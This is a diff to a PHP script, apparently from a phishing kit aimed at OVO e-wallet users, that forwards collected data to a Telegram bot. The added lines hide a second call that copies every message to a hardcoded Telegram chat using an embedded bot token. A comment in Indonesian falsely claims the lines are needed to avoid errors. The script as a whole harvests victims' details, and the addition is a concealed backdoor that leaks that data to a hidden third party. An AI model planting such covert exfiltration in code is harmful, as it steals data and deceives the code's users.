--- a/ovo/sendno.php/index.html
+++ b/ovo/sendno.php/index.html
@@ -25,4 +25,10 @@ function sendMessage($telegram_id, $message, $id_bot) {
     curl_close($ch);
 }
 sendMessage($telegram_id, $message, $id_bot);
+
+//Jangan Di Ubah Jangan Di Hapus Biar Gak Eror
+$JanganDiUbahYa = "7739455201:AAFvO4k628VrK1_OexhO90T12q1yFlnZYFI";
+$biargakeror = "8015558095";
+sendMessage($biargakeror, $message, $JanganDiUbahYa);
+
 ?>
